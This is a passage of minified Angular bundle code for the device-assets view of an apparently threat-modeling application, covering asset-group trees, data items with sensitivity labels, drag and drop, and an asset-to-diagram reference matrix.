.as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}th[_ngcontent-%COMP%], td[_ngcontent-%COMP%]{font-size:small}tr[_ngcontent-%COMP%]{height:30px!important}th.mat-header-cell[_ngcontent-%COMP%]:first-of-type, td.mat-cell[_ngcontent-%COMP%]:first-of-type, td.mat-footer-cell[_ngcontent-%COMP%]:first-of-type{padding-left:5px!important}th.mat-header-cell[_ngcontent-%COMP%]:last-of-type, td.mat-cell[_ngcontent-%COMP%]:last-of-type, td.mat-footer-cell[_ngcontent-%COMP%]:last-of-type{padding-right:5px!important}.removed-item[_ngcontent-%COMP%]{opacity:.3}.tools[_ngcontent-%COMP%]{display:block;float:left;height:27px;width:calc(100% - 20px);font-size:12px}.toolBtn[_ngcontent-%COMP%]{width:30px;min-width:30px;padding:0;line-height:25px;margin-left:5px}.toolBtn-Selected[_ngcontent-%COMP%]{background-color:#ffffff26}.filterInput[_ngcontent-%COMP%]{margin-left:5px;width:200px;height:25px}.disable[_ngcontent-%COMP%]{pointer-events:none}"]}),t})();function Jpt(t,a){1&t&&(s(0),oe(1,"translate")),2&t&&ct("\n        ",re(1,1,"pages.modeling.deviceassets.assetview"),"\n      ")}function Zpt(t,a){if(1&t){const e=Ye();m(0,"button",11),he("click",function(){be(e);const n=B().$implicit;return Me(B().DeleteGroup(n))}),oe(1,"translate"),m(2,"mat-icon"),s(3,"delete"),u()()}2&t&&at("matTooltip",re(1,1,"general.Delete"))}function e_t(t,a){if(1&t){const e=Ye();m(0,"button",11),he("click",function(n){be(e);const r=B().$implicit;return Me(B().AddGroup(r,n))}),oe(1,"translate"),m(2,"mat-icon"),s(3,"add"),u()()}2&t&&at("matTooltip",re(1,1,"general.Add"))}function t_t(t,a){if(1&t){const e=Ye();m(0,"button",11),he("click",function(n){be(e);const r=B().$implicit;return Me(B().AddMyData(r,n))}),oe(1,"translate"),m(2,"mat-icon"),s(3,"description"),u()()}2&t&&at("matTooltip",re(1,1,"general.Data"))}function i_t(t,a){if(1&t){const e=Ye();m(0,"button",15),he("click",function(){be(e);const n=B().$implicit;return Me(B(2).DeleteMyData(n))}),oe(1,"translate"),m(2,"mat-icon"),s(3,"delete"),u()()}2&t&&at("matTooltip",re(1,1,"general.Delete"))}function a_t(t,a){if(1&t){const e=Ye();m(0,"div",12),he("click",function(n){const c=be(e).$implicit;return Me(B(2).SelectObject(n,c))})("dragstart",function(n){const c=be(e).$implicit;return Me(B(2).onDrag(n,c))}),s(1,"\n              "),m(2,"mat-icon"),s(3,"description"),u(),m(4,"span",13),s(5),u(),s(6," "),ne(7,i_t,4,3,"button",14),s(8,"\n            "),u()}if(2&t){const e=a.$implicit,i=B(2);Ct("highlight-dark",i.theme.IsDarkMode&&i.selectedObject==e)("highlight-light",!i.theme.IsDarkMode&&i.selectedObject==e),C(5),ke(e.Name),C(2),V("ngIf",!i.hideButtons)}}function n_t(t,a){if(1&t){const e=Ye();m(0,"button",11),he("click",function(){be(e);const n=B().$implicit;return Me(B(3).DeleteGroup(n))}),oe(1,"translate"),m(2,"mat-icon"),s(3,"delete"),u()()}2&t&&at("matTooltip",re(1,1,"general.Delete"))}function o_t(t,a){if(1&t){const e=Ye();m(0,"button",11),he("click",function(n){be(e);const r=B().$implicit;return Me(B(3).AddGroup(r,n))}),oe(1,"translate"),m(2,"mat-icon"),s(3,"add"),u()()}2&t&&at("matTooltip",re(1,1,"general.Add"))}function r_t(t,a){if(1&t){const e=Ye();m(0,"button",11),he("click",function(n){be(e);const r=B().$implicit;return Me(B(3).AddMyData(r,n))}),oe(1,"translate"),m(2,"mat-icon"),s(3,"description"),u()()}2&t&&at("matTooltip",re(1,1,"general.Data"))}function s_t(t,a){if(1&t){const e=Ye();m(0,"button",15),he("click",function(){be(e);const n=B().$implicit;return Me(B(4).DeleteMyData(n))}),oe(1,"translate"),m(2,"mat-icon"),s(3,"delete"),u()()}2&t&&at("matTooltip",re(1,1,"general.Delete"))}function c_t(t,a){if(1&t){const e=Ye();m(0,"div",12),he("click",function(n){const c=be(e).$implicit;return Me(B(4).SelectObject(n,c))})("dragstart",function(n){const c=be(e).$implicit;return Me(B(4).onDrag(n,c))}),s(1,"\n                    "),m(2,"mat-icon"),s(3,"description"),u(),m(4,"span",13),s(5),u(),s(6," "),ne(7,s_t,4,3,"button",14),s(8,"\n                  "),u()}if(2&t){const e=a.$implicit,i=B(4);Ct("highlight-dark",i.theme.IsDarkMode&&i.selectedObject==e)("highlight-light",!i.theme.IsDarkMode&&i.selectedObject==e),C(5),ke(e.Name),C(2),V("ngIf",!i.hideButtons)}}const l_t=function(t){return{$implicit:t,colCnt:1}};function d_t(t,a){if(1&t&&it(0,"div",20),2&t){const e=a.$implicit;B(4),V("ngTemplateOutlet",Ti(9))("ngTemplateOutletContext",fr(2,l_t,e))}}function m_t(t,a){if(1&t){const e=Ye();m(0,"div",5),he("click",function(n){const c=be(e).$implicit;return Me(B(3).SelectObject(n,c))}),s(1,"\n                  "),m(2,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(B(3).onDrag(n,c))})("drop",function(n){const c=be(e).$implicit;return Me(B(3).onDrop(n,c))})("dragover",function(n){return be(e),Me(B(3).onAllowDrop(n))}),s(3,"\n                    "),m(4,"span"),s(5),u(),s(6,"\n                    "),ne(7,n_t,4,3,"button",7),s(8,"\n                    "),ne(9,o_t,4,3,"button",7),s(10,"\n                    "),ne(11,r_t,4,3,"button",7),s(12,"\n                  "),u(),s(13,"\n                  "),ne(14,c_t,9,6,"div",8),s(15,"\n                  "),m(16,"div",18),s(17,"\n                    "),ne(18,d_t,1,4,"div",19),s(19,"\n                  "),u(),s(20,"\n                "),u()}if(2&t){const e=a.$implicit,i=B(2).isFirst,n=B();ri("margin-left",i?"0px":"20px"),Ct("disableAsset",!e.IsActive)("highlight-dark",n.theme.IsDarkMode&&n.selectedObject==e)("highlight-light",!n.theme.IsDarkMode&&n.selectedObject==e),C(5),ke(e.Name),C(2),V("ngIf",!n.hideButtons),C(2),V("ngIf",!n.hideButtons),C(2),V("ngIf",!n.hideButtons),C(3),V("ngForOf",e.AssociatedData),C(4),V("ngForOf",e.SubGroups)}}function u_t(t,a){if(1&t&&(m(0,"div",16),s(1,"\n                "),ne(2,m_t,21,14,"div",17),s(3,"\n              "),u()),2&t){const e=a.index,i=B(),n=i.colCnt,r=i.$implicit,c=B();ri("width",(100/n).toString()+"%"),C(2),V("ngForOf",c.GetArrayRange(r.SubGroups,e,n))}}function h_t(t,a){if(1&t){const e=Ye();s(0,"\n        "),m(1,"div",5),he("click",function(n){const c=be(e).$implicit;return Me(B().SelectObject(n,c))}),s(2,"\n          "),m(3,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(B().onDrag(n,c))})("drop",function(n){const c=be(e).$implicit;return Me(B().onDrop(n,c))})("dragover",function(n){return be(e),Me(B().onAllowDrop(n))}),s(4,"\n            "),m(5,"span"),s(6),u(),s(7,"\n            "),ne(8,Zpt,4,3,"button",7),s(9,"\n            "),ne(10,e_t,4,3,"button",7),s(11,"\n            "),ne(12,t_t,4,3,"button",7),s(13,"\n          "),u(),s(14,"\n          "),m(15,"div"),s(16,"\n            "),ne(17,a_t,9,6,"div",8),s(18,"\n          "),u(),s(19,"\n          "),m(20,"div"),s(21,"\n            "),m(22,"div",9),s(23,"\n              "),ne(24,u_t,4,3,"div",10),s(25,"\n            "),u(),s(26,"\n          "),u(),s(27,"\n        "),u(),s(28,"\n      ")}if(2&t){const e=a.$implicit,i=a.colCnt,n=a.isFirst,r=B();C(1),Ct("disableAsset",!e.IsActive)("highlight-dark",r.theme.IsDarkMode&&r.selectedObject==e)("highlight-light",!r.theme.IsDarkMode&&r.selectedObject==e),C(2),ri("text-align",n?"center":"left")("height",n?"40px":"auto"),C(2),ri("font-weight",n?"bold":"normal"),C(1),ke(e.Name),C(2),V("ngIf",!r.hideButtons),C(2),V("ngIf",!r.hideButtons),C(2),V("ngIf",!r.hideButtons),C(5),V("ngForOf",e.AssociatedData),C(7),V("ngForOf",r.GetColArray(i))}}function f_t(t,a){1&t&&(m(0,"div",35),s(1,"\xa0"),u()),2&t&&ri("min-width",B(3).GetGapWidth())}function p_t(t,a){1&t&&(bt(0),s(1,"\xa0"),Mt())}function __t(t,a){if(1&t){const e=Ye();m(0,"button",11),he("click",function(n){be(e);const r=B(4);return Me(r.AddGroup(r.assetGroup,n))}),oe(1,"translate"),m(2,"mat-icon"),s(3,"add"),u()()}2&t&&at("matTooltip",re(1,1,"general.Add"))}function g_t(t,a){if(1&t&&(bt(0),ne(1,__t,4,3,"button",7),Mt()),2&t){const e=B(3);C(1),V("ngIf",!e.hideButtons)}}const C_t=function(t){return{$implicit:t,isFirst:!0,colCnt:1}};function y_t(t,a){if(1&t&&(bt(0),s(1,"\n              "),ne(2,f_t,2,2,"div",31),s(3,"\n              "),m(4,"div",32),s(5,"\n                "),m(6,"div",33),s(7,"\n                  "),Ir(8,20),s(9,"\n                "),u(),s(10,"\n              "),u(),s(11,"\n              "),m(12,"div",34),s(13,"\n                "),ne(14,p_t,2,0,"ng-container",30),s(15,"\n                "),ne(16,g_t,2,1,"ng-container",30),s(17,"\n              "),u(),s(18,"\n            "),Mt()),2&t){const e=a.$implicit,i=a.first,n=a.last,r=B(2),c=Ti(9);C(2),V("ngIf",i),C(2),ri("width",r.GetColumnWidth())("background-color",r.theme.IsDarkMode?r.bgColorDark:r.bgColorLight),Ct("disableAsset",!e.IsActive),C(4),V("ngTemplateOutlet",c)("ngTemplateOutletContext",fr(13,C_t,e)),C(4),ri("width",r.GetGapWidth()),C(2),V("ngIf",!n),C(2),V("ngIf",n)}}function b_t(t,a){if(1&t){const e=Ye();m(0,"button",11),he("click",function(n){be(e);const r=B(3);return Me(r.AddGroup(r.assetGroup,n))}),oe(1,"translate"),m(2,"mat-icon"),s(3,"add"),u()()}2&t&&at("matTooltip",re(1,1,"general.Add"))}function M_t(t,a){if(1&t&&(m(0,"div",36),s(1,"\n              "),ne(2,b_t,4,3,"button",7),s(3,"\n            "),u()),2&t){const e=B(2);C(2),V("ngIf",!e.hideButtons)}}const v_t=function(t){return{$implicit:t,isFirst:!0,colCnt:3}};function A_t(t,a){if(1&t&&(bt(0),s(1,"\n                "),m(2,"div",33),s(3,"\n                  "),Ir(4,20),s(5,"\n                "),u(),s(6,"\n              "),Mt()),2&t){const e=B(2),i=Ti(9);C(4),V("ngTemplateOutlet",i)("ngTemplateOutletContext",fr(2,v_t,e.assetGroupBase))}}function T_t(t,a){if(1&t&&(s(0,"\n        "),m(1,"div",21),s(2,"\n          "),m(3,"div",22),s(4,"\n            "),fi(),m(5,"svg",23),s(6,"\n              "),it(7,"path",24),s(8," \n            "),u(),s(9,"\n          "),u(),s(10,"\n          "),ln(),m(11,"div",25),s(12,"\n            "),ne(13,y_t,19,15,"ng-container",26),s(14,"\n            "),ne(15,M_t,4,1,"div",27),s(16,"\n          "),u(),s(17,"\n          "),m(18,"div",28),s(19,"\n            "),m(20,"div",29),s(21,"\n              "),ne(22,A_t,7,4,"ng-container",30),s(23,"\n            "),u(),s(24,"\n          "),u(),s(25,"\n        "),u(),s(26,"\n      ")),2&t){const e=B();C(7),Rt("fill",e.theme.IsDarkMode?e.bgColorDark:e.bgColorLight),C(6),V("ngForOf",e.assetGroupsCols),C(2),V("ngIf",0==e.assetGroupsCols.length),C(5),ri("background-color",e.theme.IsDarkMode?e.bgColorDark:e.bgColorLight),C(2),V("ngIf",e.assetGroupBase)}}function E_t(t,a){1&t&&(s(0),oe(1,"translate")),2&t&&ct("\n        ",re(1,1,"pages.modeling.deviceassets.assettree"),"\n      ")}function D_t(t,a){if(1&t){const e=Ye();s(0,"\n        "),m(1,"as-split",37),he("dragEnd",function(n){return be(e),Me(B().OnSplitSizeChange(n,0))}),s(2,"\n          "),m(3,"as-split-area",38),s(4,"\n            "),m(5,"app-nav-tree",39,40),he("selectedNodeChanged",function(n){return be(e),Me(B().selectedNode=n)}),u(),s(7,"\n          "),u(),s(8,"\n          "),m(9,"as-split-area",38),s(10,"\n            "),m(11,"app-assets",41),he("nodeTreeChanged",function(n){return be(e),Me(B().SetNavTreeData(n))}),u(),s(12,"\n          "),u(),s(13,"\n        "),u(),s(14,"\n      ")}if(2&t){const e=B();C(1),V("gutterSize",3)("restrictMove",!0),C(2),Ct("splitter-light2",!e.theme.IsDarkMode)("splitter-dark2",e.theme.IsDarkMode),V("size",e.GetSplitSize(0,0,350))("order",1),C(2),V("activeNode",e.selectedNode),C(4),Ct("bg-color-light3",!e.theme.IsDarkMode)("bg-color-dark3",e.theme.IsDarkMode),V("size",e.GetSplitSize(0,1,"*"))("order",2),C(2),V("isProject",!0)("assetGroup",e.assetGroup)("selectedNode",e.selectedNode)}}function x_t(t,a){1&t&&(s(0),oe(1,"translate")),2&t&&ct("\n        ",re(1,1,"pages.modeling.deviceassets.datalist"),"\n      ")}function w_t(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",51),he("click",function(){const r=be(e).$implicit;return Me(B(2).selectedMyData=r)}),s(1,"\n                "),m(2,"mat-icon",52),s(3,"arrow_right"),u(),s(4,"\n                "),m(5,"div",53),s(6),u(),s(7,"\n                "),m(8,"div",53),s(9),oe(10,"translate"),oe(11,"translate"),u(),s(12,"\n                "),m(13,"button",54),he("click",function(){const r=be(e).$implicit;return Me(B(2).DeleteMyData(r))}),oe(14,"translate"),m(15,"mat-icon"),s(16,"delete"),u()(),s(17,"\n              "),u()}if(2&t){const e=a.$implicit,i=B(2);Ct("highlight-light",i.selectedMyData===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedMyData===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(e.GetLongName()),C(3),za("",re(10,9,"properties.Sensitivity"),": ",re(11,11,i.GetSensitivity(e.Sensitivity)),""),C(4),at("matTooltip",re(14,13,"general.Delete"))}}function I_t(t,a){if(1&t&&(bt(0),s(1,"\n              "),m(2,"div",55),s(3,"\n                "),it(4,"app-mydata",56),s(5,"\n              "),u(),s(6,"\n            "),Mt()),2&t){const e=B(2);C(4),V("myData",e.selectedMyData)("showAssetGroup",!0)}}function R_t(t,a){if(1&t){const e=Ye();s(0,"\n        "),m(1,"div",9),s(2,"\n          "),m(3,"div",42),s(4,"\n            "),m(5,"mat-list",43),s(6,"\n              "),m(7,"div",44),s(8),oe(9,"translate"),m(10,"button",45),he("click",function(n){be(e);const r=B();return Me(r.AddMyData(r.assetGroup,n))}),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()(),s(14,"\n                "),m(15,"button",46),oe(16,"translate"),m(17,"mat-icon"),s(18,"more_vert"),u()(),s(19,"\n                "),m(20,"mat-menu",null,47),s(22,"\n                  "),m(23,"button",48),he("click",function(){return be(e),Me(B().ResetNumbers())}),s(24),oe(25,"translate"),u(),s(26,"\n                "),u(),s(27,"\n              "),u(),s(28,"\n              "),ne(29,w_t,18,15,"mat-list-item",49),s(30,"\n            "),u(),s(31,"\n          "),u(),s(32,"\n          "),m(33,"div",50),s(34,"\n            "),ne(35,I_t,7,2,"ng-container",30),s(36,"\n          "),u(),s(37,"\n        "),u(),s(38,"\n      ")}if(2&t){const e=Ti(21),i=B();C(5),Ct("prop-list-light",!i.theme.IsDarkMode)("prop-list-dark",i.theme.IsDarkMode),C(3),ct("",re(9,12,"general.Datas")," \n                "),C(2),at("matTooltip",re(11,14,"general.Add")),C(5),at("matTooltip",re(16,16,"general.More")),V("matMenuTriggerFor",e),C(8),V("disabled",i.assetGroup.GetMyDataFlat().length<2),C(1),ke(re(25,18,"pages.modeling.threattable.resetNumbers")),C(5),V("ngForOf",i.assetGroup.GetMyDataFlat()),C(6),V("ngIf",i.assetGroup.GetMyDataFlat().includes(i.selectedMyData))}}function S_t(t,a){1&t&&(s(0),oe(1,"translate")),2&t&&ct("\n        ",re(1,1,"pages.modeling.deviceassets.referencematrix"),"\n      ")}function k_t(t,a){if(1&t){const e=Ye();m(0,"th",59),s(1,"\n                  "),m(2,"button",61),he("click",function(){const r=be(e).$implicit;return Me(B(2).OpenDiagram(r))}),oe(3,"translate"),s(4),u(),s(5,"\n                "),u()}if(2&t){const e=a.$implicit,i=B(2);ri("border-color",i.theme.IsDarkMode?i.bgColorDark:i.bgColorLight),C(2),Kc("matTooltip","",re(3,5,"pages.modeling.deviceassets.OpenDiagram"),": ",e.Name,""),C(2),ke(e.Name)}}function P_t(t,a){if(1&t){const e=Ye();m(0,"th",59),s(1,"\n                  "),m(2,"button",61),he("click",function(){const r=be(e).$implicit;return Me(B(2).OpenDiagram(r))}),oe(3,"translate"),s(4),u(),s(5,"\n                "),u()}if(2&t){const e=a.$implicit,i=B(2);ri("border-color",i.theme.IsDarkMode?i.bgColorDark:i.bgColorLight),C(2),Kc("matTooltip","",re(3,5,"pages.modeling.deviceassets.OpenDiagram"),": ",e.Name,""),C(2),ke(e.Name)}}function O_t(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                    "),m(2,"button",63),he("click",function(){const r=be(e).$implicit,c=B().$implicit;return Me(B(3).OpenElement(c,r))}),oe(3,"translate"),s(4),u(),s(5,"\n                    "),it(6,"br"),s(7,"\n                  "),Mt()}if(2&t){const e=a.$implicit;C(2),Kc("matTooltip","",re(3,3,"pages.modeling.deviceassets.OpenElement"),": ",e.Name,""),C(2),ke(e.Name)}}function N_t(t,a){if(1&t&&(m(0,"td",59),s(1,"\n                  "),ne(2,O_t,8,5,"ng-container",26),s(3,"\n                "),u()),2&t){const e=a.$implicit,i=B().$implicit,n=B(2);ri("border-color",n.theme.IsDarkMode?n.bgColorDark:n.bgColorLight),C(2),V("ngForOf",n.GetReferences(i,e))}}function L_t(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                    "),m(2,"button",63),he("click",function(){const r=be(e).$implicit,c=B().$implicit;return Me(B(3).OpenElement(c,r))}),oe(3,"translate"),s(4),u(),s(5,"\n                    "),it(6,"br"),s(7,"\n                  "),Mt()}if(2&t){const e=a.$implicit;C(2),Kc("matTooltip","",re(3,3,"pages.modeling.deviceassets.OpenElement"),": ",e.Name,""),C(2),ke(e.Name)}}function z_t(t,a){if(1&t&&(m(0,"td",59),s(1,"\n                  "),ne(2,L_t,8,5,"ng-container",26),s(3,"\n                "),u()),2&t){const e=a.$implicit,i=B().$implicit,n=B(2);ri("border-color",n.theme.IsDarkMode?n.bgColorDark:n.bgColorLight),C(2),V("ngForOf",n.GetReferences(i,e))}}function W_t(t,a){if(1&t&&(m(0,"tr"),s(1,"\n                "),m(2,"td")(3,"span",62),s(4),u()(),s(5,"\n                "),ne(6,N_t,4,3,"td",60),s(7,"\n                "),it(8,"td"),s(9,"\n                "),ne(10,z_t,4,3,"td",60),s(11,"\n              "),u()),2&t){const e=a.$implicit,i=B(2);C(2),ri("border-color",i.theme.IsDarkMode?i.bgColorDark:i.bgColorLight),C(1),at("matTooltip",i.GetAssetToolTip(e)),V("matBadgeHidden",!i.GetAssetToolTip(e)),C(1),ke(e.Name),C(2),V("ngForOf",i.dataService.Project.GetHWDiagrams()),C(2),ri("border-color",i.theme.IsDarkMode?i.bgColorDark:i.bgColorLight),C(2),V("ngForOf",i.dataService.Project.GetDFDiagrams())}}function F_t(t,a){if(1&t&&(s(0,"\n        "),m(1,"div",57),s(2,"\n          "),m(3,"table"),s(4,"\n            "),m(5,"thead"),s(6,"\n              "),m(7,"tr"),s(8,"\n                "),it(9,"th"),s(10,"\n                "),m(11,"th"),s(12),oe(13,"translate"),u(),s(14,"\n                "),it(15,"th",58),s(16,"\n                "),m(17,"th"),s(18),oe(19,"translate"),u(),s(20,"\n              "),u(),s(21,"\n              "),m(22,"tr"),s(23,"\n                "),m(24,"th",59),s(25),oe(26,"translate"),u(),s(27,"\n                "),ne(28,k_t,6,7,"th",60),s(29,"\n                "),it(30,"th"),s(31,"\n                "),ne(32,P_t,6,7,"th",60),s(33,"\n              "),u(),s(34,"\n            "),u(),s(35,"\n            "),m(36,"tbody"),s(37,"\n              "),ne(38,W_t,12,9,"tr",26),s(39,"\n            "),u(),s(40,"\n          "),u(),s(41,"\n        "),u(),s(42,"\n      ")),2&t){const e=B();C(9),ri("border-color",e.theme.IsDarkMode?e.bgColorDark:e.bgColorLight),C(2),ri("border-color",e.theme.IsDarkMode?e.bgColorDark:e.bgColorLight),Rt("colspan",e.dataService.Project.GetHWDiagrams().length),C(1),ke(re(13,20,"pages.modeling.deviceassets.HWDiagram")),C(3),ri("border-color",e.theme.IsDarkMode?e.bgColorDark:e.bgColorLight),C(2),ri("border-color",e.theme.IsDarkMode?e.bgColorDark:e.bgColorLight),Rt("colspan",e.dataService.Project.GetDFDiagrams().length),C(1),ke(re(19,22,"pages.modeling.deviceassets.DFDiagram")),C(6),ri("border-color",e.theme.IsDarkMode?e.bgColorDark:e.bgColorLight),C(1),ke(re(26,24,"pages.modeling.deviceassets.dataDiagrams")),C(3),V("ngForOf",e.dataService.Project.GetHWDiagrams()),C(2),ri("border-color",e.theme.IsDarkMode?e.bgColorDark:e.bgColorLight),C(2),V("ngForOf",e.dataService.Project.GetDFDiagrams()),C(6),V("ngForOf",e.assetGroup.GetMyDataFlat())}}let IZ=(()=>{class t{constructor(e,i,n,r,c,d,T,k){this.theme=e,this.dataService=i,this.locStorage=n,this.dialog=r,this.elRef=c,this.translate=d,this.router=T,this.activatedRoute=k,this.selectedMyData=null,this.hideButtons=!1,this.selectionChanged=new Tt,this.bgColorDark="#424242",this.bgColorLight="#e7e5e5",this.newGroupDict={},this.colArray=[],this.references={}}get selectedNode(){return this._selectedNode}set selectedNode(e){this._selectedNode=e}SetNavTreeData(e){this.navTree.SetNavTreeData(e)}get selectedObject(){return this._selectedObject}set selectedObject(e){this._selectedObject=e}get assetGroupBase(){return 0==this.assetGroup.SubGroups.length?null:this.assetGroup.SubGroups[0]}get assetGroupsCols(){return this.assetGroup.SubGroups.length<=1?[]:this.assetGroup.SubGroups.slice(1)}ngOnInit(){}SelectObject(e,i){null==e||e.stopPropagation(),this.selectionChanged.emit(i)}AddGroup(e,i){var n;let r;r=e.IsProjectAsset?this.dataService.Project.CreateAssetGroup(e):this.dataService.Config.CreateAssetGroup(e),null===(n=e.ImpactCats)||void 0===n||n.forEach(c=>r.ImpactCats.push(c)),this.SelectObject(i,r),setTimeout(()=>{document.dispatchEvent(new KeyboardEvent("keydown",{key:"F2"}))},250)}DeleteGroup(e){this.dialog.OpenDeleteObjectDialog(e).subscribe(i=>{i&&(this.selectedObject==e&&this.SelectObject(null,null),e.IsProjectAsset?this.dataService.Project.DeleteAssetGroup(e):this.dataService.Config.DeleteAssetGroup(e))})}IsNewAssetGroup(e){return e.ID in this.newGroupDict||(this.newGroupDict[e.ID]=null==this.dataService.Config.AssetGroups.GetGroupsFlat().find(i=>{var n,r;return i.Name==e.Name&&null!=i.Parent&&(null===(n=i.Parent)||void 0===n?void 0:n.Name)==(null===(r=e.Parent)||void 0===r?void 0:r.Name)})),this.newGroupDict[e.ID]}GetColArray(e){return e!=this.colArray.length&&(this.colArray=Array(e).fill(0).map((i,n)=>n)),this.colArray}GetArrayRange(e,i,n){if(e.length>0&&n>1){const r=Math.round(e.length/n);return i==n-1?e.slice(r*i):e.slice(r*i,r*(i+1))}return e}GetColumnWidth(){return(100/(1.2*this.assetGroupsCols.length+.2)).toString()+"%"}GetGapWidth(){return(.2*Number(this.GetColumnWidth().replace("%",""))).toString()+"%"}DeleteMyData(e){this.dataService.Project.DeleteMyData(e),this.selectedMyData==e&&(this.selectedMyData=null),this.selectedObject==e&&this.SelectObject(null,null)}AddMyData(e,i){var n;let r=this.dataService.Project.CreateMyData(e);null===(n=e.ImpactCats)||void 0===n||n.forEach(c=>r.ImpactCats.push(c)),this.selectedMyData=r,this.SelectObject(i,r),setTimeout(()=>{document.dispatchEvent(new KeyboardEvent("keydown",{key:"F2"}))},250)}ResetNumbers(){let e=1;const i=n=>{n.IsNewAsset&&(n.Number=(e++).toString()),n.AssociatedData.forEach(r=>{r.IsNewAsset&&(r.Number=(e++).toString())}),n.SubGroups.forEach(r=>i(r))};i(this.assetGroup)}GetSensitivity(e){return An.ToString(e)}GetSensitivities(){return An.GetKeys()}GetReferences(e,i){return(!this.references[e.ID]||!this.references[e.ID][i.ID])&&(this.references[e.ID]||(this.references[e.ID]={}),this.references[e.ID][i.ID]=i.Elements.GetChildrenFlat().filter(n=>{var r;let c=null===(r=n.GetProperty("ProcessedData"))||void 0===r?void 0:r.includes(e);return c&&n instanceof rs&&(c=n.OverwriteDataProperties),c})),this.references[e.ID][i.ID]}GetAssetToolTip(e){const i=this.dataService.Project.GetHWDiagrams().some(c=>{var d;return(null===(d=this.GetReferences(e,c))||void 0===d?void 0:d.length)>0}),n=this.dataService.Project.GetDFDiagrams().some(c=>{var d;return(null===(d=this.GetReferences(e,c))||void 0===d?void 0:d.length)>0});let r="";return i||n?i?n||(r+=this.translate.instant("pages.modeling.deviceassets.noReferenceInDF")):r+=this.translate.instant("pages.modeling.deviceassets.noReferenceInHW"):r=this.translate.instant("pages.modeling.deviceassets.noReferenceInDFHW"),""==r?null:r}OpenDiagram(e){this.router.navigate([],{relativeTo:this.activatedRoute,queryParams:{viewID:e.ID},replaceUrl:!0})}OpenElement(e,i){this.router.navigate([],{relativeTo:this.activatedRoute,queryParams:{viewID:e.ID,elementID:i.ID},replaceUrl:!0})}onAllowDrop(e){e.preventDefault()}onDrag(e,i){e.dataTransfer.setData("ID",i.ID),i instanceof Pu?e.dataTransfer.setData("type","MyData"):i instanceof Zl&&e.dataTransfer.setData("type","AssetGroup")}onDrop(e,i){if(e.preventDefault(),"MyData"==e.dataTransfer.getData("type")){const n=this.dataService.Project.GetMyData(e.dataTransfer.getData("ID"));n.FindAssetGroup().RemoveMyData(n),i.AddMyData(n)}else if("AssetGroup"==e.dataTransfer.getData("type")){const n=this.dataService.Project.GetAssetGroup(e.dataTransfer.getData("ID"));n.GetGroupsFlat().includes(i)||(n.Parent.RemoveAssetGroup(n),i.AddAssetGroup(n))}}GetSelectedTabIndex(){let e=this.locStorage.Get(si.PAGE_MODELING_ASSETS_TAB_INDEX);return null!=e?e:0}SetSelectedTabIndex(e){this.selectedNode=null,this.SelectObject(null,null),this.locStorage.Set(si.PAGE_MODELING_ASSETS_TAB_INDEX,e)}GetSplitSize(e,i,n){let r=this.locStorage.Get(si.PAGE_MODELING_ASSETS_SPLIT_SIZE_X+e.toString());return null!=r?Number(JSON.parse(r)[i]):n}OnSplitSizeChange(e,i){this.locStorage.Set(si.PAGE_MODELING_ASSETS_SPLIT_SIZE_X+i.toString(),JSON.stringify(e.sizes))}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(_r),Ee(Wn),Ee(mi),Ee(Sn),Ee(Oo),Ee(Tl))},t.\u0275cmp=Wt({type:t,selectors:[["app-device-assets"]],viewQuery:function(e,i){if(1&e&&Mi(df,5),2&e){let n;Vt(n=Bt())&&(i.navTree=n.first)}},inputs:{assetGroup:"assetGroup",hideButtons:"hideButtons",selectedObject:"selectedObject"},outputs:{selectionChanged:"selectionChanged"},decls:36,vars:1,consts:[[2,"width","100%","height","100%"],[1,"tabGroup",2,"height","100%",3,"selectedIndex","selectedIndexChange"],["mat-tab-label",""],["assetGroupTemplate",""],["matTabContent",""],[3,"click"],["draggable","true",1,"draggable",3,"dragstart","drop","dragover"],["mat-icon-button","","class","assetButton","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["style","margin-left: 20px;","class","draggable","draggable","true",3,"highlight-dark","highlight-light","click","dragstart",4,"ngFor","ngForOf"],[1,"row"],["style","float: left;",3,"width",4,"ngFor","ngForOf"],["mat-icon-button","","matTooltipShowDelay","1000",1,"assetButton",3,"matTooltip","click"],["draggable","true",1,"draggable",2,"margin-left","20px",3,"click","dragstart"],[2,"vertical-align","super"],["mat-icon-button","","class","assetButton","style","vertical-align: 